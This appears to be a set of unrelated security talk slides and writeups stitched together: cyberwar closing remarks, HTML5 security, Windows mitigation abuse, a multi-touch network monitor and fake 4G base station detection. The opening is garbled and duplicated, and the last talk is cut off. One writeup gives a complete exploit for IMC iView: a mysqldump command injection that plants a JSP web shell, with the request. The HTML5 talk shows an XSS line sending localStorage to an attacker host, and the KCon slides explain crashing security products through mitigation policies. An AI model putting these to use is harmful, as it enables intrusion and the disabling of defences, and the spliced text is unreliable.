largely unnecessary from being hard to carry out and largely unnecessary Cyberwar is still aided by humans being located around Cyberwar is still aided by humans being located around the world and performing covert actions the world and performing covert actions Can Can’’t have all the cyber warriors in a bunker at Fort t have all the cyber warriors in a bunker at Fort Meade Meade What about defense? What about defense? 
Defender can use the buildup period to try to detect and Defender can use the buildup period to try to detect and eliminate cyberwar presense eliminate cyberwar presense Best defense is to eliminate vulnerabilities in software Best defense is to eliminate vulnerabilities in software Best way to do that is to hold software vendors liable for Best way to do that is to hold software vendors liable for the damage caused by the vulnerabilities in their software the damage caused by the vulnerabilities in their software Currently there is no financial incentive for companies to Currently there is no financial incentive for companies to produce vulnerability free software produce vulnerability free software Building in security costs them money and doesn Building in security costs them money and doesn’’t provide t provide them anything in return them anything in return Thanks to Thanks to Early draft readers Early draft readers Dino Dai Zovi Dino Dai Zovi Dave Aitel Dave Aitel Jose Nazario Jose Nazario Dion Blazakis Dion Blazakis Dan Caselden Dan Caselden Twitter people who gave comments Twitter people who gave comments Questions? Questions? Contact me at Contact me at cmiller@securityevaluators.com cmiller@securityevaluators.com
pdf
Author: @Y4er.com

Call-graph query (find paths from servlet entry points down to Runtime.exec):

MATCH (n:Class{NAME:'javax.servlet.http.HttpServlet'})-[:EXTEND]-(c:Class)-[:HAS]->(m:Method)-[:CALL*2]-(m1:Method{NAME:'exec',CLASS_NAME:'java.lang.Runtime'}) return *

Analysis: com.imc.iview.network.NetworkServlet#doPost runs two checks on the input.

com.imc.iview.utils.CUtils#checkFileNameIncludePath(java.lang.String) checks for \webapps\ in the path to prevent writing a shell.

com.imc.iview.utils.CUtils#checkSQLInjection blacklists a handful of keywords:

public boolean checkSQLInjection(String model0) {
    boolean result = false;
    String model = model0.toLowerCase();
    if (!model.contains(" or ") && !model.contains("'or ") && !model.contains("||") && !model.contains("==") && !model.contains("--")) {
        if (model.contains("union") && model.contains("select")) {
            if (this.checkCommentStr(model, "union", "select")) {
                result = true;
            }
        } else if (model.contains("case") && model.contains("when")) {
            if (this.checkCommentStr(model, "case", "when")) {
                result = true;
            }
        } else if (model.contains("into") && model.contains("dumpfile")) {
            if (this.checkCommentStr(model, "into", "dumpfile")) {
                result = true;
            }
        } else if (model.contains("into") && model.contains("outfile")) {
            if (this.checkCommentStr(model, "into", "outfile")) {
                result = true;
            }
        } else if (model.contains(" where ") && model.contains("select ")) {
            result = true;
        } else if (model.contains("benchmark")) {
            result = true;
        } else if (model.contains("select") && model.contains("from")) {
            if (this.checkCommentStr(model, "select", "from")) {
                result = true;
            }
        } else if (model.contains("select/*")) {
            result = true;
        } else if (model.contains("delete") && model.contains("from")) {
            if (this.checkCommentStr(model, "delete", "from")) {
                result = true;
            }
        } else if (model.contains("drop") && model.contains("table") || model.contains("drop") && model.contains("database")) {
            if (this.checkCommentStr(model, "drop", "table")) {
                result = true;
            }
            if (this.checkCommentStr(model, "drop", "database")) {
                result = true;
            }
        } else if (!model.contains("sleep(") && !model.contains(" rlike ") && !model.contains("rlike(") && !model.contains(" like ")) {
            if (model.startsWith("'") && model.endsWith("#") && model.length() > 5) {
                result = true;
            } else if ((model.startsWith("9999'") || model.endsWith("#9999") || model.contains("#9999")) && model.length() > 10) {
                result = true;
            } else if (model.contains("getRuntime().exec") || model.contains("getruntime().exec") || model.contains("getRuntime()")) {
                result = true;
            }
        } else {
            result = true;
        }
    } else {
        result = true;
    }
    if (result) {
        System.out.println("Error: SQL Injection Vulnerability detected in [" + model0 + "]");
    }
    return result;
}

With mysqldump, the -w option can be abused to write attacker-controlled content into a file, and because -r can be passed more than once, a later -r overrides the earlier -r output path.

The normal command is:

"C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMCTrapService\backup\aa"

Constructing the command-injection payload (the value of the backup filename parameter):

2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"

Proof-of-concept request:

POST /iView3/NetworkServlet HTTP/1.1
Host: 172.16.16.132:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

page_action_type=backupDatabase&backup_filename=2.sql"+-r+"./webapps/iView3/test.jsp"+-w+"<%25%3dnew+String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new+ProcessBuilder(request.getParameter(new+java.lang.String(new+byte[]{99,109,100}))).start()).getInputStream()))%25>"

After concatenation, the executed command becomes:

"C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMCTrapService\backup\2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"

It has the same flavor as the classic PHP log-file getshell.

Fix: check the session login state before handling the request.

My writing is rough, the wording casual, the content shallow and the technique clumsy; pointers and corrections from the masters are welcome and much appreciated.
pdf
Abusing HTML5
DEF CON 19
Ming Chow, Lecturer, Department of Computer Science, Tufts University, Medford, MA 02155, mchow@cs.tufts.edu

What is HTML5?
• The next major revision of HTML. To replace XHTML? Yes
• Close enough to a full-fledged development environment
• The three aspects of HTML5:
– Content (HTML)
– Presentation of content (CSS)
– Interaction with content (JavaScript)
• Still work in progress
• Backing from Google, Microsoft, and of course Apple
• Currently supported (not 100%) in Chrome, Firefox 3.5+, Opera, Internet Explorer 8, and Safari
• Many incompatibilities exist; perform a browser test via http://www.html5test.com
• Will be flexible with error handling (i.e., incorrect syntax). Older browsers will safely ignore the new HTML5 syntax.

HTML5: What's In? What's Out?
• In:
– New tags, including <button>, <video>, <audio>, <article>, <footer>, <nav>
– New attributes for tags such as autocomplete, autofocus, pattern (yes, regex) for input
– New media events
– New <canvas> tag for 2D rendering
– New form controls for date and time
– Geolocation
– New selectors
– Client-side storage including localStorage, sessionStorage, and Web SQL
• Out:
– Presentation elements such as <font>, <center>
– Presentation attributes including align, border
– <frame>, <frameset>
– <applet>
– Old special effects: <marquee>, <bgsound>
– <noscript>

Quick Demos
• Video captioning
• Canvas
• Geolocation

Structure of an HTML5 Document
<!DOCTYPE html>
<html>
<head>
<title>An HTML Document</title>
... ... ...
</head>
<body>
<p>Everything that you practically know of stays the same</p>
... ...
</body>
</html>

Areas of Concern
• The attack surface: client-side
• Client-side and offline storage
– No longer just cookies and sessions
– Compared to cookies and sessions, allows a greater amount of data to be stored
– What if the client's database synchronizes with the production database on the server and the client's database contains malicious data?
• Cross-origin JavaScript requests
• Sending messages from one document to another (on another domain)
• Holy smokes, background computational power!
• The complexity of HTML5 making the browser worse

localStorage and sessionStorage
• Provides key-value mappings (currently, string-to-string mappings)
• Very much like cookies.
• Differences:
– Cookies => 4 KB; localStorage => depends on browser (usually in MB)
– Unlike cookies, sessionStorage and localStorage data are NOT sent to the server!
– sessionStorage data is confined to the browser window it was created in, lasts until the browser is closed
– localStorage has longer persistence, can last even after the browser is closed
• Trivial to use:
– (localStorage | sessionStorage).setItem()
– (localStorage | sessionStorage).getItem()
– (localStorage | sessionStorage).removeItem()
– Or use associative array syntax for localStorage or sessionStorage

Hardly Any Security with localStorage or sessionStorage
• If you have an XSS vulnerability in your application, anything stored in localStorage is available to an attacker.
• Example: <script>document.write("<img src='http://attackersite.com?cookie="+localStorage.getItem('phrase')+"'>");</script>
• Never a good idea to store sensitive data locally.
• Someone with access to your machine can read everything (via Chrome Developer Tools or Firebug)

Web SQL
• Brings SQL to the client-side
• Not new: see Google Gears
• Core methods:
– openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");
– transaction("YOUR SQL STATEMENT HERE");
– executeSql();
• Prepared statements supported
• The usual gang of attacks: XSS, SQL injection
• Demos

Web SQL (continued)
• The usual gang of preventions:
– Use prepared statements
– Output encoding (before storing data and after fetching data)
• New wrenches:
– Do not store sensitive data in a client-side database
– Like localStorage and sessionStorage, someone with access to your machine can read everything (via Chrome Developer Tools or Firebug)
– Can you really trust what is stored in a client-side database?
– Create the database and store data over SSL
– Ask the user for permission before creating and storing a local database

Application Cache
• Useful for offline browsing, speed, and reducing server load
• The size limit for cached data for a site: 5 MB
• Example 1A, enabling the application cache:
<html manifest="example.manifest">
…
</html>
• Example 1B, the manifest file (example.manifest):
CACHE MANIFEST
# 2010-06-18:v2
# Explicitly cached entries
CACHE:
index.html
stylesheet.css
images/logo.png
scripts/main.js

Application Cache (continued)
• Example 2, updating the Application Cache:
applicationCache.addEventListener('checking', updateCacheStatus, false);

Poisoning the Application Cache
• Any website can create a cache on the user's computer
• No permission required before allowing a site to create an application cache in Chrome or Safari
• Any file can be cached, including the root file "/"
• The catch: even if a root resource is cached normally, on refresh the normal cache is updated but not the Application Cache
• Read: http://blog.andlabs.org/2010/06/chrome-and-safari-users-open-to-stealth.html

Cross-Origin JavaScript Requests (or Cross-Origin Resource Sharing)
• Not directly part of HTML5 but introduced by W3C
• XDomainRequest() created by Microsoft in Internet Explorer 8
• In some cases, XMLHttpRequest() now allows cross-domain requests (Firefox 3.5+ and Safari 4+)
• Caveat: consent between the web page and the server is required.
– Server must respond with an Access-Control-Allow-Origin header of either * (a.k.a. universal allow, not good!) or the exact URL of the requesting page (site-level; white-list)
– Example 1 (BAD!): header('Access-Control-Allow-Origin: *');
– Example 2 (BAD!): Access-Control-Allow-Origin: http://allowed.origin/page?cors=other.allowed.origin%20malicious.spoof
• Resolutions:
– Add some form of authentication / credentials checking (e.g., cookie)
– Validate the response

Cross-Document Messaging
• Establish a communication channel between frames in different origins
• Requires a sender and a receiver
• Sender: window.postMessage("message", "targetOrigin");
• Demo
• Watch out! If you are the receiver of a message from another site, verify the sender's identity using the origin property.
Example (receiver):
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event) {
  if (event.origin !== "http://example.org") {
    … … …
  }
}

Web Workers
• Very powerful stuff; allows background computational tasks via JavaScript (think threads)
• Really simple: instantiate a Worker object in JavaScript
• Example: var w = new Worker("some_script.js");
• w.onmessage = function(e) { // do something };
• To terminate a worker: w.terminate();
• Caveat: web workers cannot run locally (i.e., file:///)
• Same-origin security principle applies
• Things that a worker has access to: XHR, navigator object, application cache, spawning other workers!
• Things that a worker does not have access to: DOM, window, document objects
• What you could do with a worker: use your wildest imagination…

But What About the New HTML5 Tags and Attributes?
• Depends on browser, spec of codec or format
• Native audio and video rendering (read: <video> and <audio>). What if there are flaws in the codec?
• On some browsers (e.g., Firefox < 4), you can embed JavaScript as the value of the onerror attribute of <video> or <audio> with <source>
• Example: <audio onerror="javascript:alert('ugh!')"><source src="uhoh.mp3" /></audio>
• Heap buffer overflow via transformations and painting in HTML5 canvas in Opera. http://www.opera.com/support/kb/view/966/ (fixed)
• What if an inline SVG call contains JavaScript and HTML? Example (this works in Firefox < 4 but not in Chrome < 7): <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
• Potential client-side ReDoS via the pattern attribute of input (Opera 10+)
– Example: <input pattern="^((a+.)a)+$" value="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa…" />

Summary
• A lot of the same old problems, same old resolutions (read: common sense, input validation, be careful connecting to an unsecured network / public Wi-Fi)
• Important to remember: the HTML5 standard is still work-in-progress, being finalized, and evolving...
• ...but at the same time, the spike of i{Phone, Pod Touch, Pad}, Android, and other mobile devices that do not support Flash has spurred the growth and interest in HTML5. Alas, HTML5 and its security issues cannot be ignored.

References and Resources
• HTML5
– http://www.html5rocks.com/
– http://html5doctor.com/introducing-web-sql-databases/
– http://www.webreference.com/authoring/languages/html/HTML5-Client-Side/
• HTML5 Security
– http://www.darkreading.com/vulnerability-management/167901026/security/application-security/224701560/index.html
– http://www.nytimes.com/external/idg/2010/08/20/20idg-html5-raises-new-security-issues-59174.html
– http://www.veracode.com/blog/2010/05/html5-security-in-a-nutshell/
– http://www.eweek.com/c/a/Security/HTML5-Security-Facts-Developers-Should-Keep-in-Mind-551353/
– http://threatpost.com/en_us/blogs/security-concern-html5-gains-traction-091610
– http://stackoverflow.com/questions/787067/is-there-a-xdomainrequest-equivalent-in-firefox
– http://www.andlabs.org/html5.html
– http://heideri.ch/jso/
– http://code.google.com/p/html5security/
– http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
– http://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener/
– http://blogs.forbes.com/andygreenberg/2010/11/04/html5-tricks-hijack-browsers-to-crack-passwords-spew-spam/
– http://mashable.com/2011/04/29/html5-web-security/
pdf
剑走偏锋 —蓝军实战缓解措施滥用 # Whoami • @askme765cs • 安全研究员@绿盟科技 • M01N战队核心成员 • 专注系统安全与终端对抗 目录 CONTENTS 01 02 03 Mitigations 101 Red Team Operation "Mitigation Hell" Part 01 Mitigations 101 01 Why Mitigations? 漏洞利用两种常见路径 • 数据破坏 • 代码执行 利用过程中的动作与特征 • 修改代码段 • 加载DLL • 创建新进程 • … Mitigations的效用 • 截断利用链,削减机会窗口 • 对抗未知威胁与潜在攻击 02 Mitigations Timeline • ASLR • DEP • SafeSEH • SEHOP • CFG • CIG • ACG • Child Process Policy • CFG Strict Mode • CFG Export Suppression • NoLowMandatoryLabelImages • … Pre-Win10 TH1 RS1 RS2 RS3 + 03 Code intergerity guard-CIG • Windows 10 TH2 (1511)引入 • 阻止恶意DLL注入受保护应用程序 • 对加载DLL的签名进行验证 • 仅允许可信签名的DLL加载 • MicrosoftSignedOnly • StoreSignedOnly • 内核主要检查代码位于 MiValidateSectionSigningPolicy • 受影响的API NtCreateSection 04 Arbitrary code guard-ACG • Windows 10 RS1 (1607)引入 • 贯彻W^X原则 • 禁止修改已有代码(X)修改为可写(W) • 禁止修改可写数据(W)修改为可执行(X) • 禁止分配或映射新的可执行内存 • 内核主要检查代码位于 MiAllowProtectionChange MiMapViewOfSection • 受影响的API NtAllocateVirtualMemory NtProtectVirtualMemory NtMapViewOfSection(SEC_IMAGE/SEC_FILE) Arbitrary code guard-ACG 05 • 用户态API • VirtualAlloc with PAGE_EXECUTE_* • VirtualProtect with PAGE_EXECUTE_* • MapViewOfFile with FILE_MAP_EXECUTE | FILE_MAP_WRITE • SetProcessValidCallTargets for CFG Boundary of ACG 06 • 只能限制程序本身,不能阻止其他程序对其的修改 • 开启AllowRemoteDowngrade则可通过其他程序关闭ACG 08 Mitigation Flags-EPROCESS ULONG Flags、Flags2、Flags3、Flags4 ULONG MitigationFlags、MitigationFlags2 09 Mitigation Policy-注册表 设置指定名称\路径程序的Mitigation Policy-IFEO • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ • MitigationOptions:REG_BINARY 系统全局Mitigation Policy • HKLM\System\CurrentControlSet\Control\Session Manager\kernel\ • MitigationOptions:REG_BINARY 10 Mitigation Policy-注册表 11 Mitigation Policy-Powershell 查看程序Mitigation Policy(从程序读取) • Get-ProcessMitigation –Running –Name notepad.exe 查看程序Mitigation Policy(从注册表读取) • Get-ProcessMitigation -Name notepad.exe 设置程序Mitigation Policy(写入注册表) • Set-ProcessMitigation -Name notepad.exe -Enable MicrosoftSignedOnly 12 13 系统设置 • 设置系统全局Mitiation Policy • CFG、DEP、强制ASLR等 程序设置 • 设置单个程序Mitigation Policy • 图形化、用户友好 Mitigation Policy-Exploit Protection Part 02 Red Team Operation 14 CobaltStrike Blockdlls • CobaltStirke 3.14版本中引入 • 开启后子进程只能加载微软签名的DLL • 一些后渗透指令受益于blockdlls • Spawn • Screenshot • Keylogger • Mimikatz • … 15 16 Blockdlls原理-CIG滥用 • UpdateProcThreadAttribute • 子进程中开启CIG • 阻止部分安全产品DLL注入 若DLL有微软签名? 17 18 更进一步,阻击HOOK • CIG无法阻止签名DLL的加载 • ACG可阻止对代码段的修改 • 利用ACG阻止DLL对代码段的修改 EDR DLL Malware .text System DLLs 19 ACG+CIG防线 DL L 签名 加载 Y N CIG Hook AC G 注入 20 实时修改自身Mitigation Policy • SetProcessMitigationPolicy • 底层调用NtSetInformationProcess • 可实时开启CIG、ACG等Mitigations • 开启后无法由自身关闭 21 实时修改其他程序Mitigation Policy • NtSetInformationProcess • 只能修改ACG • 开启AllowRemoteDowngrade 可关闭ACG Part 03 "Mitigation Hell" 22 Side Effect Of Mitigations “Mitigation Hell”——利用缓解措施使程序失去可用性乃至崩溃 • ACG-无法修改自身代码,导致具有自解密、自修改行为的程序失败 -杀死几乎所有.NET程序,CLR初始化依赖于RWX内存 • CIG-无法加载非微软签名的组件,导致运行异常或失败 • Child Process Policy-破坏依赖子进程创建的进程,例如守护进程 若将Mitigations强制应用于未适配的安全软件会如何? 
23 剑走偏锋,利用"Mitigation Hell"击破安全防线 • 修改特定安全产品关键程序Mitigation Policy,破坏可用性 安全产品A-自修改行为+ACG=>闪 退 安全产品B-未签名DLL+CIG=>初始化错 误 ATT&CK T1562 Impair Defenses 防御削弱 24 • 修改或禁用安全产品 • 破坏日志记录机制 • 清除历史日志信息 • 限制关键IFEO注册表项修改 25 Hunting "Mitigation Hell"-Audit Mode Audit审计模式-记录日志而不阻止 Set-ProcessMitigation -Name notepad.exe -Enable AuditDynamicCode,AuditMicrosoftSigned 日志记录 Microsoft-Windows-Security-Mitigation/Kernel Mode 26 Hunting "Mitigation Hell"-ETW • Microsoft-Windows-Kernel-Memory:KERNEL_MEM_KEYWORD_ACG • Microsoft-Windows-Security-Mitigations:Microsoft-Windows-Security-Mitigations/KernelMode 观点总结 27 • Mitigations带来的不止是“安全”,亦为新的利用方式埋下伏笔 • 终端对抗领域Mitigations的利用已不鲜见,攻防一体两面,没有银弹 • 对安全软件强制开启缓解措施,有破坏其可用性的可能,是一种行之有效的手段 感谢观看! KCon 汇聚黑客的智慧 感谢观看! 演讲者:绿盟科技 顾佳伟
pdf
Hack Like the Movie Stars: A Big-Screen Multi-Touch Network Monitor George Louthan & Cody Pollet & John Hale Computer Science / www.isec.utulsa.edu Overview • Multi-touch interfaces – What is multi-touch? • This rhetorical question will not be dignified with a response. – Optical multi-touch methods • Our big board – History, building process – Other uses • The tool: DVNE – Architecture – Future plans Computer Science / www.isec.utulsa.edu Multi-touch Methods • Electronic – Capacitive (iPhone) – Hard to build at home • Optical – Main idea: capture infrared blobs with a camera Computer Science / www.isec.utulsa.edu Optical Multi-touch • The question: how to illuminate the touches? • Rear Diffused Illumination – Example: Microsoft Surface – IR shines out of the screen, illuminating objects Computer Science / www.isec.utulsa.edu Optical Multi-touch • Frustrated Total Internal Reflection – Shine light into the edges of plexiglass – Touching the glass causes it to flex and emit light – This is what we use Computer Science / www.isec.utulsa.edu Our big screen • AKA That Thing I Keep Tripping Over – FTIR method – 56” diagonal, 16:9 aspect ratio (roughly 48”x30”) – 1280 x 800 – Plexiglass construction – Laminated vellum projection screen – 168 IR LEDs – PlayStation Eye camera Computer Science / www.isec.utulsa.edu Our big screen Computer Science / www.isec.utulsa.edu Architecture • Touch signals over UDP – TUIO Protocol Computer Science / www.isec.utulsa.edu What do we DO with it? • Some ongoing projects – Immersive collaboration (multi-touch caves) – Educational software (we're building tables for schools) • But we're a security lab – We also like campy movies. (“It's a UNIX system!”) Computer Science / www.isec.utulsa.edu We also play games ... Computer Science / www.isec.utulsa.edu DVNE • Dynamic Visualization for Network Environments – Primary goal: to build a flashy Hollywood-style computer interface – Secondary goal: build something useful for looking at networks • Network monitor – Track TCP streams, identify protocol using signatures • Interface – Python with pymt multitouch extensions – TUIO Computer Science / www.isec.utulsa.edu Resources • Natural User Interface Group – http://www.nuigroup.com • PyMT – http://pymt.txzone.net • Pyglet – http://www.pyglet.org Computer Science / www.isec.utulsa.edu Acknowledgements Support for this research through the National Science Foundation Cyber Trust Program (Award Number 0524740) is gratefully acknowledged.
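The DVNE architecture described above receives touch input as TUIO messages over UDP (TUIO is carried on OSC, conventionally on port 3333). As a rough sketch of what a standalone listener for the TUIO 2D cursor profile might look like, assuming the python-osc package rather than pymt's built-in provider (the handler name and port here are illustrative, not part of DVNE):

# Minimal TUIO 2Dcur listener sketch (assumes the python-osc package).
# pymt/DVNE has its own TUIO provider; this only illustrates the wire format.
from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_server import BlockingOSCUDPServer

def on_2dcur(address, *args):
    # TUIO 1.1 cursor profile: "set" carries session id, then x and y
    # (normalized 0..1), velocity and acceleration; "alive" lists live ids.
    if args and args[0] == "set":
        session_id, x, y = args[1], args[2], args[3]
        print(f"touch {session_id}: x={x:.3f} y={y:.3f}")

dispatcher = Dispatcher()
dispatcher.map("/tuio/2Dcur", on_2dcur)

# TUIO trackers conventionally send to UDP port 3333.
BlockingOSCUDPServer(("0.0.0.0", 3333), dispatcher).serve_forever()

Because the touch tracker and the interface only share a UDP socket, any TUIO-speaking tracker (or a simulator) can drive the same interface, which is what makes the camera/projector hardware and the Python front end easy to develop independently.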
pdf
<location, date> <Location, date> Defcon Safe Mode // Aug 2020 Detecting Fake 4G Base Stations in Real Time Cooper Quintin - Senior Security Researcher - EFF Threat Lab Defcon Safe Mode With Networking 2020 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Intro • Cooper Quintin – Senior security researcher – Has a toddler (dad jokes) – Former teenage phone phreak • EFF – Member supported non profit – Defending civil liberties – 30 years • Threat lab <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Yomna! None of this research would have been possible without her hard work. This is as much her project as mine. Twitter: @rival_elf Actual photo of Yomna <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Technology that Targets At Risk People • Activists, human rights defenders, journalists, domestic abuse victims, immigrants, sex workers, minority groups, political dissidents, etc… • Goals of this technology – Gather intelligence on opposition – Spy extraterritorially or illegally – Locate and capture – Extortion – Harass and intimidate – Stifle freedom of expression <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Jeff Bezos Can Afford a Security Team Cybersecurity and AV companies care about the types of malware that affects their customers (usually enterprise.) We get to care about the types of technology the infringe on civil liberties and human rights of at risk people. This guy is not at risk. <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Our Goals • Protect people • Broaden our communities` understanding of threats and defenses • Expose bad actors • Make better laws <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Project Dark Caracal Stalkerware <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What We are Going to Talk About Today • Cell-site simulators AKA Stingrays or IMSI Catchers • How they work • Previous efforts to detect them • A new method to detect them • How to fix the problem <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview • UE - The phone - User Equipment • IMSI - International Mobile Subscriber ID - ID for the SIM card • IMEI - International Mobile Equipment ID - ID for the hardware • eNodeB - Base station, what the UE is actually communicating with. • EARFCN - The frequency a UE/EnodeB is transmitting on • Sector - A specific antenna on the base station <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview • MIB - Master Information block, broadcast by the enodeb and tells where to find the SIB • SIB - System information block, contains details about the enodeb • MCC / MNC / TAC - Mobile Country Code, Mobile Network Code, Tracking Area Code • PLMN = MCC + MNC, Public Land Mobile Network <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview IMSI catcher, Stingray, Hailstorm, fake base station == cell-site simulator (CSS) This is acronym hell and I’m sorry. 
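For a concrete sense of the EARFCN value defined in the Cell Technology Overview: an EARFCN is just an index into the LTE band plan, so converting it to a downlink centre frequency is a table lookup plus a linear formula. A hedged sketch follows; only a few bands are filled in here, and the offsets come from 3GPP TS 36.101, so they should be verified against the spec before being relied on.

# Sketch: convert an LTE downlink EARFCN to a centre frequency in MHz.
# Formula per 3GPP TS 36.101: F_DL = F_DL_low + 0.1 * (EARFCN - N_Offs_DL).
DL_BANDS = {
    # band: (earfcn_min, earfcn_max, f_dl_low_mhz, n_offs_dl)
    1: (0, 599, 2110.0, 0),
    2: (600, 1199, 1930.0, 600),
    3: (1200, 1949, 1805.0, 1200),
    4: (1950, 2399, 2110.0, 1950),
}

def earfcn_to_mhz(earfcn: int) -> float:
    for band, (lo, hi, f_low, offs) in DL_BANDS.items():
        if lo <= earfcn <= hi:
            return f_low + 0.1 * (earfcn - offs)
    raise ValueError(f"EARFCN {earfcn} not in the bands listed here")

print(earfcn_to_mhz(2050))  # band 4 example: 2120.0 MHz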
<location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Stingray <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What Changed Between 2G and 4G • eNodeB and UE mutually authenticate • Better encryption between eNodeB and UE • No longer naively connect to the strongest tower <location, date> <Location, date> Defcon Safe Mode // Aug 2020 How do 4G CSS Work • What are the vulns next gen CSS are taking advantage of? • Pre authentication handshake attacks • Downgrade attacks Gotta catch em all whitepaper by Yomna <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Pre-Authentication Vulnerabilities • 4G has a glass jaw • Even though the UE authenticates the tower there are still several messages that it sends, receives, and trusts before authentication happens or w/o authentication • This is the weak spot in which the vast majority of 4G attacks happen <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Hus Insecure Connection Bootstrapping in Cellular Networks:The Root of All Evil - Hussein et al 2019 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Hus Insecure Connection Bootstrapping in Cellular Networks:The Root of All Evil - Hussein et al 2019 Here there be dragons <location, date> <Location, date> Defcon Safe Mode // Aug 2020 How Often are CSS Being Used • ICE/DHS - hundreds of times per year – https://www.aclu.org/news/immigrants-rights/ice-records-confirm -that-immigration-enforcement-agencies-are-using-invasive-cell-p hone-surveillance-devices/ • Local law enforcement – Oakland - 1-3 times per year • https://oaklandprivacy.org/oakland-privacy-sues-vallejo/ – Santa Barbara PD - 231 times in 2017 • https://www.eff.org/deeplinks/2019/05/eff-asks-san-bernardino-court-rev iew-device-search-and-cell-site-simulator <location, date> <Location, date> Defcon Safe Mode // Aug 2020 How Often are CSS Being Used • Foreign Spies – IMSI Catchers in DC • Cyber Mercenaries – NSO Group https://www.amnestyusa.org/wp-content/uploads/2020/06/Moro cco-NSO-Group-report.pdf • Criminals – https://venturebeat.com/2014/09/18/the-cell-tower-mystery-grip ping-america-has-now-been-solved-or-has-it/ <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Efforts to Detect CSS App Based • AIMSICD • Snoop Snitch • Darshark Strengths • Cheap • Easy to use Weaknesses • Limited data • Lots of false positives • False negatives? <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Efforts to Detect CSS Radio Based • Seaglass • SITCH • Overwatch Strengths • Better data • Lower level information Weaknesses • Harder to set up, use, interpret • Cost of hardware • Can’t transmit <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Efforts to Detect CSS <location, date> <Location, date> Defcon Safe Mode // Aug 2020 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Can we detect 4G IMSI Catchers? • How can we improve on previous attempts – Lower level data – See all towers not just what we are connecting to – Compare that data over time – Look at 4G antennas! – Verify results! 
<location, date> <Location, date> Defcon Safe Mode // Aug 2020 Introducing Crocodile Hunter <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Crocodile Hunter Software Stack • Backend based on SRSLTE – Open source LTE software stack – Written in C++ – Communicates with frontend over a local socket • Python for heuristics, database and frontend – Get data from socket – Add it to database – Run heuristics – Display tower locations • API for sharing data <location, date> <Location, date> Defcon Safe Mode // Aug 2020 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Crocodile Hunter Hardware Stack • Laptop / Raspberry Pi • USB GPS Dongle • SDR compatible with SRSLTE: BladeRF, Ettus B200 • LTE Antennas • (Battery for Pi) <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Crocodile Hunter Hardware Stack <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Workflow 1. Decode MIB and SIB1 for all the cells that we can see and record them. 2. Map the probable location of cells 3. Look for anomalies in the readings 4. Locate suspicious cells and confirm results <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Decode MIB and SIB1 • SRSLTE scans a list of EARFCNS • If we find a mib we decode mib and sib and send over socket <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Database <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Mapping out antennas in real time • Using trilateration and distance estimates we can figure out where all the towers are • Compare this to a ground truth such as wigle or opencellid <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Triangulation (Bearing) L = B₁∩B₂∩B₃ Trilateration vs Triangulation Trilateration L = R₁∩R₂∩R₃ x° y° d <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Looking for Anomalies • Cells moving • Cells that change signal strength • Cells that aren’t where they should be • Cells changing parameters • Cells missing parameters • New cells • Anomaly != CSS, that's why we have to verify <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Why Don’t we Transmit? EFF Lawyers <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What we Found so Far Cell on wheels at Dreamforce <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What we Found so Far • Suspicious foreign towers in DC Suspicious eNodeBs in Washington DC <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Washington DC <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Ongoing Tests • Latin America (FADe Project) • DC • NYC • Your hometown (coming soon…) <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Future Work • Better heuristics • Better location finding • Machine learning for detection of anomalies • Port to cheaper hardware <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What’s With the Name? Press F to pay respects to Steve <location, date> <Location, date> Defcon Safe Mode // Aug 